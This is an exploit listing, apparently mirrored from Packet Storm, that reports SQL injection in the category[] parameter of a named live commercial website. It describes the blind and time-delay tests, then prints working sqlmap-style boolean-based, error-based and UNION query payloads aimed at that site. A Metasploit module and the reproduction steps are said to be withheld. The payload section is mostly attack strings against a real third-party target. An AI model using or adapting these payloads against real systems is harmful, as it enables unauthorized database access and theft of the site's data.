Share
## https://sploitus.com/exploit?id=PACKETSTORM:210609
# Titles: greenlife-CopyrightΒ©2025-Multiple-SQLi - Metasploit module - soon
    # Author: nu11secur1ty
    # Date: 10/06/2025
    # Vendor: https://www.greenlife.bg/bg
    # Software: https://www.greenlife.bg/bg
    # Reference: https://portswigger.net/web-security/sql-injection
    
    ## Description:
    The category%5B%5D parameter appears to be vulnerable to SQL injection
    attacks. The payloads and 7609=07609 and and 2154=2162 were each submitted
    in the category%5B%5D parameter. These two requests resulted in different
    responses, indicating that the input is being incorporated into a SQL query
    in an unsafe way.
    Note that automated difference-based tests for SQL injection flaws can
    often be unreliable and are prone to false positive results. You should
    manually review the reported requests and responses to confirm whether a
    vulnerability is actually present.
    Additionally, the payload (select*from(select(sleep(20)))a) was submitted
    in the category%5B%5D parameter. The application took 20206 milliseconds to
    respond to the request, compared with 1413 milliseconds for the original
    request, indicating that the injected SQL command caused a time delay.
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Payload:
    - SQLi:
    
    ```SQLi
    ---
    Parameter: category[] (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: category[]=1 and 2154=2162&category[]=3&category[]=5) AND
    6069=6069 AND (9510=9510&city[]=1&city[]=6&city[]=7&city[]=8&city[]=10
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP
    BY clause (FLOOR)
        Payload: category[]=1 and 2154=2162&category[]=3&category[]=5) OR
    (SELECT 6421 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT
    (ELT(6421=6421,1))),0x7176717a71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
    (5033=5033&city[]=1&city[]=6&city[]=7&city[]=8&city[]=10
    
        Type: UNION query
        Title: MySQL UNION query (UCHAR) - 16 columns
        Payload: category[]=1 and 2154=2162&category[]=3&category[]=5) UNION
    ALL SELECT
    'UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR','UCHAR',CONCAT(0x717a626b71,0x765652555971466244766b754c4e6263616e686c4877515a467876567069714c4e43504441625a4b,0x7176717a71),'UCHAR','UCHAR','UCHAR'#&city[]=1&city[]=6&city[]=7&city[]=8&city[]=10
    ---
    ```
    
    [+]MSF exploit:
    
    ```rb
    soon... but not will published
    
    ```
    [+]Reproduce:
    It is not present for security reasons!
    
    # Time spent:
    00:15:00
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.html
    https://cxsecurity.com/ and https://www.exploit-db.com/
    home page: https://www.asc3t1c-nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <https://nu11secur1ty.blogspot.com/>
    nu11secur1ty <https://nu11secur1ty.com/>